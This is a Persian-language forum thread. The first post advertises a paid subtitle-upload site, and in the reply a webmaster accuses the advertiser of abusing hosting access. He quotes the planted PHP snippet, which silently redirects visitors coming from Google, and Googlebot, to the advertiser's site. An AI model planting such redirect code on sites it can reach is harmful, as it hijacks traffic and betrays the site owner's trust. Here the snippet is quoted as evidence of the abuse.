برگزیده های پرشین تولز

زیرنویس فارسی آپلود و کسب درآمد کنید [ معرفی فاسابتایتل ]

areff

کاربر تازه وارد
لایک‌ها
2
باسلام، زیرنویس های خود را آپلود کنید و بابت هر دانلود مبلغی را دریافت کنید، عضوگیری برای تمامی کاربران رایگان و آزاد میباشد، تاکنون 15 هزار فایل زیرنویس آپلود شده است.
قابلیت ها :

# کسب درآمد همراه با تسویه حساب آنی.
# قابلیت مشاهده نام فایل های موجود در فایل فشرده زیرنویس.
# قابلیت مشاهده 5 لاین از زیرنویس برای تشخیص کیفیت ترجمه زیرنویس.
# قابلیت تشخیص زیرنویس های فیک و گزارش و مشخص کردن زیرنویس های فیک قبل از دانلود کاربر.
# قابلیت ارسال گزارش زیرنویس فیک (بیشتر از 10 عدد رای منفی زیرنویس به صورت خودکار زیرنویس فیک شناخته خواهد شد)
# قابلیت جستجوی قسمت یا اپیزود سریال ها برای سریال هایی که بیشتر از 50 عدد فایل زیرنویس دارند.

Last edited:

sisaco

Registered User
لایک‌ها
839
دوستان محترم لطف بفرمائید هیچ پستی در ادامه اینجا نزنید. به این سایت هم مراجعه نفرمائید

$ref = $_SERVER['HTTP_REFERER'];
if(strstr($ref, "google") || strstr($_SERVER['HTTP_USER_AGENT'],"googlebot") ){
echo '<script>window.location ="http://fasubtitle.com"</script>';

}

زیرنویس فارسی | دانلود زیرنویس فیلم و سریال
دانلود زیرنویس فارسی فیلم و سریال, زیرنویس فارسی, زیرنویس سریال, زیرنویس فیلم, سایت زیرنویس فارسی, سابتایتل

آقای محترم. من به شما دسترسی دادم که چیکار کنید ؟ که بیاید برید اون اسکریپت رو نصب کندی واسم. از اون روز آمار آی پی من از 5 هزار اومد روی 1500 . چرا ؟ چون بازدیدام همه از گوگل بود. سند دارم
حالا امروز . دوستان توجه کنن. این آقا رفته این کد رو توی سایته من گذاشته . هر کی از گوگل میاد توی سایته من میره توی این سایت . Fasubtitle ! سایته ایشون که الان زدن

من همه مدارک رو گرفتم دستم. آقای محترم . وضعیت مشخص میشه ! بالاخره قانون داره همه جا. شما میای فایل میذاری توی هاسته مردم ؟ به چه اجازه ای همچین کاری میکنی ؟ اا چطور اجازه دادی به خودت همچین کاریک نی !

آی پی تون مشخصه . پرشین تولز هم ورودی لاگ آی پیتون هست. من پیگیر میشم.و ببینم به چه اجازه ای همچین کاری کردید و سو استفاده کردید از این عملی که من هاستم رو دادم.

دوستان شرمنده. من اشتباه کردم. فکر کردم.... یا علی

بالا